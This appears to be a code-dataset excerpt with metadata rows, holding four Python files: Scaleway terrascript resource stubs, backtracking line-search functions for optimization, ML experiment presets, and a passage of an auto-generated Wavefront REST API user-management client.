08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 2
|
2022-02-06T01:49:42.000Z
|
2022-02-08T14:15:00.000Z
|
# terrascript/scaleway/r.py
import terrascript
class scaleway_account_ssh_key(terrascript.Resource):
pass
class scaleway_baremetal_server(terrascript.Resource):
pass
class scaleway_instance_ip(terrascript.Resource):
pass
class scaleway_instance_ip_reverse_dns(terrascript.Resource):
pass
class scaleway_instance_volume(terrascript.Resource):
pass
class scaleway_instance_security_group(terrascript.Resource):
pass
class scaleway_instance_security_group_rules(terrascript.Resource):
pass
class scaleway_instance_server(terrascript.Resource):
pass
class scaleway_instance_placement_group(terrascript.Resource):
pass
class scaleway_k8s_cluster_beta(terrascript.Resource):
pass
class scaleway_k8s_pool_beta(terrascript.Resource):
pass
class scaleway_lb_beta(terrascript.Resource):
pass
class scaleway_lb_ip_beta(terrascript.Resource):
pass
class scaleway_lb_backend_beta(terrascript.Resource):
pass
class scaleway_lb_certificate_beta(terrascript.Resource):
pass
class scaleway_lb_frontend_beta(terrascript.Resource):
pass
class scaleway_registry_namespace_beta(terrascript.Resource):
pass
class scaleway_rdb_instance_beta(terrascript.Resource):
pass
class scaleway_object_bucket(terrascript.Resource):
pass
class scaleway_user_data(terrascript.Resource):
pass
class scaleway_server(terrascript.Resource):
pass
class scaleway_token(terrascript.Resource):
pass
class scaleway_ssh_key(terrascript.Resource):
pass
class scaleway_ip(terrascript.Resource):
pass
class scaleway_ip_reverse_dns(terrascript.Resource):
pass
class scaleway_security_group(terrascript.Resource):
pass
class scaleway_security_group_rule(terrascript.Resource):
pass
class scaleway_volume(terrascript.Resource):
pass
class scaleway_volume_attachment(terrascript.Resource):
pass
| 16.10084
| 67
| 0.799061
| 222
| 1,916
| 6.576577
| 0.18018
| 0.258219
| 0.456849
| 0.536986
| 0.855479
| 0.781507
| 0.487671
| 0.143836
| 0
| 0
| 0
| 0.001211
| 0.138309
| 1,916
| 118
| 68
| 16.237288
| 0.883101
| 0.013048
| 0
| 0.491525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.491525
| 0.016949
| 0
| 0.508475
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
82f96bf00a0e6f16dfdd3f6ac7fa4c0016bc0ddc
| 4,671
|
py
|
Python
|
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
from utils import norm_residual, logarithmic_barrier
def line_search_by_backtracking(f,dir_desc,x,
der_direct, alpha=.15, beta=.5):
'''
Line search that sufficiently decreases f restricted to a ray in the direction dir_desc.
Args:
alpha (float): parameter in line search with backtracking, tipically .15
beta (float): parameter in line search with backtracking, tipically .5
f (lambda expression): definition of function f.
dir_desc (array): descent direction.
x (array): numpy array that holds values where line search will be performed.
der_direct (float): directional derivative of f.
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
t=1
if alpha > 1/2:
print('alpha must be less than or equal to 1/2')
t=-1
if beta>1:
print('beta must be less than 1')
t=-1;
if t!=-1:
eval1 = f(x+t*dir_desc)
eval2 = f(x) + alpha*t*der_direct
while eval1 > eval2:
t=beta*t
eval1=f(x+t*dir_desc)
eval2=f(x)+alpha*t*der_direct
return t
def line_search_for_residual_by_backtracking(r_primal, r_dual,dir_desc_primal,dir_desc_dual,x, nu,
norm_residual_eval,
alpha=.15, beta=.5):
'''
Line search that sufficiently decreases residual for Newtons infeasible initial point method
restricted to a ray in the direction dir_desc.
Args:
r_primal (fun): definition of primal residual as function definition or lambda expression.
r_dual (fun): definition of dual residual as function definition or lambda expression.
dir_desc_primal (array): descent direction for primal variable.
dir_desc_dual (array): descent direction for dual variable.
x (array): numpy array that holds values where line search will be performed.
nu (array): numpy array that holds values where line search will be performed.
norm_residual_eval (float): norm of residual that has both r_primal and r_dual evaluations in
x and nu
alpha (float): parameter in line search with backtracking, tipically .15
beta (float): parameter in line search with backtracking, tipically .5
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
t=1
if alpha > 1/2:
print('alpha must be less than or equal to 1/2')
t=-1
if beta>1:
print('beta must be less than 1')
t=-1;
if t!=-1:
feas_primal = r_primal(x + t*dir_desc_primal)
feas_dual = r_dual(nu + t*dir_desc_dual )
eval1 = norm_residual(feas_primal, feas_dual)
eval2 = (1-alpha*t)*norm_residual_eval
while eval1 > eval2:
t=beta*t
feas_primal = r_primal(x + t*dir_desc_primal)
feas_dual = r_dual(nu + t*dir_desc_dual )
eval1 = norm_residual(feas_primal, feas_dual)
eval2 = (1-alpha*t)*norm_residual_eval
return t
def line_search_for_log_barrier_by_backtracking(f,dir_desc,x,t_path,
constraint_inequalities,
der_direct, alpha=.15, beta=.5):
'''
Line search that sufficiently decreases f restricted to a ray in the direction dir_desc.
Args:
alpha (float): parameter in line search with backtracking, tipically .15
beta (float): parameter in line search with backtracking, tipically .5
f (lambda expression): definition of function f.
dir_desc (array): descent direction.
x (array): numpy array that holds values where line search will be performed.
der_direct (float): directional derivative of f.
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
t=1
if alpha > 1/2:
print('alpha must be less than or equal to 1/2')
t=-1
if beta>1:
print('beta must be less than 1')
t=-1;
if t!=-1:
eval1 = logarithmic_barrier(f,x + t*dir_desc, t_path,constraint_inequalities)
eval2 = logarithmic_barrier(f,x, t_path,constraint_inequalities) + alpha*t*der_direct
while eval1 > eval2:
t=beta*t
eval1=logarithmic_barrier(f,x + t*dir_desc, t_path,constraint_inequalities)
eval2=logarithmic_barrier(f,x, t_path,constraint_inequalities) + alpha*t*der_direct
return t
| 45.794118
| 101
| 0.627703
| 646
| 4,671
| 4.390093
| 0.147059
| 0.054302
| 0.012694
| 0.042313
| 0.850846
| 0.841326
| 0.799013
| 0.766573
| 0.766573
| 0.75
| 0
| 0.020719
| 0.297367
| 4,671
| 102
| 102
| 45.794118
| 0.843388
| 0.465211
| 0
| 0.87931
| 0
| 0
| 0.08143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.017241
| 0
| 0.12069
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d217461745e9c2dab591b71af01dd3a18f395bcd
| 5,613
|
py
|
Python
|
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
experiments_20 = {
'data':
{'n_experiments': 20,
'max_set_size': 500,
'network_filename': 'H_sapiens.net', #'S_cerevisiae.net'
'directed_interactions_filename': 'KPI_dataset',
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': False,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'balanced_kpi_prop_scores',
'random_seed': 0,
'normalization_method': 'power', # Standard, Power
'split_type': 'normal'}, # 'regular'/harsh
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [64, 32],
'classifier_layers': [64, 32],
'pulling_func': 'mean',
'exp_emb_size': 4,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0
},
'train':
{'intermediate_loss_weight': 0,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 32,
'test_batch_size': 32,
'n_epochs': 1000,
'eval_interval': 3,
'learning_rate': 1e-3,
'max_evals_no_imp': 3,
'optimizer' : 'ADAMW' # ADAM/WADAM
}}
experiments_50 = {
'data':
{'n_experiments': 50,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': 'KPI_dataset',
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': True,
'save_prop_scores': False,
'prop_scores_filename': 'balanced_kpi_prop_scores',
'random_seed': 0,
'normalization_method': 'standard'
},
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [128, 64],
'classifier_layers': [128, 64],
'pulling_func': 'mean',
'exp_emb_size': 12,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0
},
'train':
{'intermediate_loss_weight': 0.5,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 32,
'test_batch_size': 32,
'n_epochs': 4,
'eval_interval': 2,
'learning_rate': 5e-4,
'max_evals_no_imp': 3,
'optimizer' : 'ADAMW' # ADAM/WADAM
}}
experiments_0 = {
'data':
{'n_experiments': 0,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': ['KPI'],
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': True,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'drug_KPI_0',
'random_seed': 0,
'normalization_method': 'power', # Standard, Power
'split_type': 'normal'}, # 'regular'/harsh
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [128, 64],
'classifier_layers': [64],
'pulling_func': 'mean',
'exp_emb_size': 16,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0,
},
'train':
{'intermediate_loss_weight': 0.5,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 4,
'test_batch_size': 32,
'n_epochs': 4,
'eval_interval': 2,
'learning_rate': 1e-3,
'max_evals_no_imp': 3,
'optimizer': 'ADAMW' # ADAM/WADAM
}}
experiments_all_datasets = {
'data':
{'n_experiments': 0,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': ['KPI', 'STKE', 'EGFR', 'E3','PDI'],
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': True,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'balanced_KPI_STKE_EGFR_E3',
'random_seed': 0,
'normalization_method': 'power', # Standard, Power
'split_type': 'normal'}, # 'regular'/harsh
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [64, 32, 16],
'classifier_layers': [32, 16],
'pulling_func': 'mean',
'exp_emb_size': 12,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0,
},
'train':
{'intermediate_loss_weight': 0.95,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 8,
'test_batch_size': 8,
'n_epochs': 2000,
'eval_interval': 2,
'learning_rate': 1e-3,
'max_evals_no_imp': 15,
}}
| 33.213018
| 80
| 0.544629
| 607
| 5,613
| 4.670511
| 0.186161
| 0.049383
| 0.033862
| 0.018342
| 0.923457
| 0.923457
| 0.914638
| 0.904409
| 0.904409
| 0.890653
| 0
| 0.051138
| 0.303225
| 5,613
| 168
| 81
| 33.410714
| 0.673741
| 0.044718
| 0
| 0.783951
| 0
| 0
| 0.482049
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d25d2e23823c9cf23a022ab84b1423425a077029
| 60,713
|
py
|
Python
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 11
|
2016-05-30T17:16:45.000Z
|
2021-06-11T19:32:59.000Z
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 25
|
2016-05-02T23:05:19.000Z
|
2020-11-18T22:43:20.000Z
|
wavefront_api_client/api/user_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 30
|
2016-04-29T17:17:11.000Z
|
2022-02-11T04:58:37.000Z
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class UserApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_user_to_user_groups(self, id, **kwargs): # noqa: E501
"""Adds specific groups to the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user_to_user_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be added to the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_user_to_user_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_user_to_user_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def add_user_to_user_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Adds specific groups to the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user_to_user_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be added to the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_user_to_user_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_user_to_user_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/addUserGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_user(self, **kwargs): # noqa: E501
"""Creates an user if the user doesn't already exist. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool send_email: Whether to send email notification to the user, if created. Default: false
:param UserToCreate body: Example Body: <pre>{ \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_user_with_http_info(**kwargs) # noqa: E501
return data
def create_user_with_http_info(self, **kwargs): # noqa: E501
"""Creates an user if the user doesn't already exist. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool send_email: Whether to send email notification to the user, if created. Default: false
:param UserToCreate body: Example Body: <pre>{ \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['send_email', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'send_email' in params:
query_params.append(('sendEmail', params['send_email'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_multiple_users(self, **kwargs): # noqa: E501
"""Deletes multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_multiple_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body: identifiers of list of users which should be deleted
:return: ResponseContainerListString
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_multiple_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_multiple_users_with_http_info(**kwargs) # noqa: E501
return data
def delete_multiple_users_with_http_info(self, **kwargs): # noqa: E501
"""Deletes multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_multiple_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body: identifiers of list of users which should be deleted
:return: ResponseContainerListString
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_multiple_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/deleteUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerListString', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user(self, id, **kwargs): # noqa: E501
"""Deletes a user or service account identified by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_user_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes a user or service account identified by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_users(self, **kwargs): # noqa: E501
"""Get all users # noqa: E501
Returns all users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserModel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_users_with_http_info(**kwargs) # noqa: E501
return data
def get_all_users_with_http_info(self, **kwargs): # noqa: E501
"""Get all users # noqa: E501
Returns all users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[UserModel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[UserModel]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user(self, id, **kwargs): # noqa: E501
"""Retrieves a user by identifier (email address) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_user_with_http_info(id, **kwargs) # noqa: E501
return data
def get_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a user by identifier (email address) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_business_functions(self, id, **kwargs): # noqa: E501
"""Returns business functions of a specific user or service account. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_business_functions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_business_functions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_user_business_functions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_user_business_functions_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns business functions of a specific user or service account. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_business_functions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_business_functions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
